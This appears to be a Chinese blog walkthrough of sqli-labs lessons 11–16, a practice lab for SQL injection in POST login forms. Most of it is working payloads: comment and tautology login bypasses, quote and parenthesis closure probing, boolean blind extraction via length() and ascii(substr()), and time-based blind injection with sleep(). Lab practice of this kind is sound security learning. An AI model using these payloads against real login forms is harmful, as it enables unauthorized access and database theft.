sqli-labs(less-11-16)
阿新 • • 發佈:2018-12-01
POST登入
首先試試
uname=admin'# & passwd=1
登入成功
如果不知道使用者名稱 ,註釋符被過濾,可以從password入手
一般第一個登陸欄位(一般是使用者名稱)就用註釋,第二個登陸欄位(一般就密碼)用閉合和註釋都是可以的
uname=test & passwd=1'or 1='1
接下來利用盲注猜解資料庫(布林盲注)
uname=test & passwd=1'or length(database())>0 or 1='2 //#被過濾情況下 uname=test & passwd=1'or length(database())>0 #
剩下的步驟和get一樣
一個個猜解資料庫的名字
uname=test & passwd=1'or ascii(substr((select database()),1,1))>0 or 1='2
less-12
uname=test & passwd=1'or 1='1
先猜解是被單引號包圍還是雙引號還是括號什麼的
uname=test & passwd=1" #
爆語法錯誤了,語句沒寫好QAQ
uname=test' # & passwd=1
uname=test" # & passwd=1
之前搞錯了 ,不存在test這個使用者所以當然不了
uname=admin‘ # & passwd=1 uname=admin" # & passwd=1 uname=admin‘) # & passwd=1 uname=admin") # & passwd=1 //成功登入
uname=test & passwd=1 or 1='1 uname=test & passwd=1 or 1="1 uname=test & passwd=1or 1=('1 uname=test & passwd=1 or 1=("1 //按理說這個應該可以 都登不進去
原來是passwd那個沒有用")閉合
uname=test & passwd=1") or 1=("1
爆資料庫
uname=test & passwd=1") or length(database())>0 or 2=("1
接下來的步驟和之前一樣
less-13
uname=admin' # & passwd=1 uname=admin") # & passwd=1 ') " 都報錯了
看原始碼是‘)閉合的鴨 怎麼就不行呢
原來如此 ,登入了也不返回結果
注意一下 ,成功了會返回圖片
less-13
uname=admin" # & passwd=1
less-14
嘗試sleep()時間盲注
uname=admin" and sleep(10) # & passwd=1
uname=admin" or sleep(10) # & passwd=1
延遲了,發現可以sleep盲注,當用or 的時候是一直在轉 不知道為什麼
uname=admin" # & passwd=1
less-15
'
uname=admin") # & passwd=1
')
")
都報錯了,不過輸入單引號沒有返回結果 // 視窗有點小 往下滑就了
uname=admin' & passwd=1
試一下永真
uname=a & passwd=1' or 1='1
less-16
uname=admin") #&passwd=a'
uname=admin") #&passwd=a'or length(database())>0 1=("1
利用sleep()
uname=a&passwd=a") or if(length((select database()))=8,1,sleep(5)) #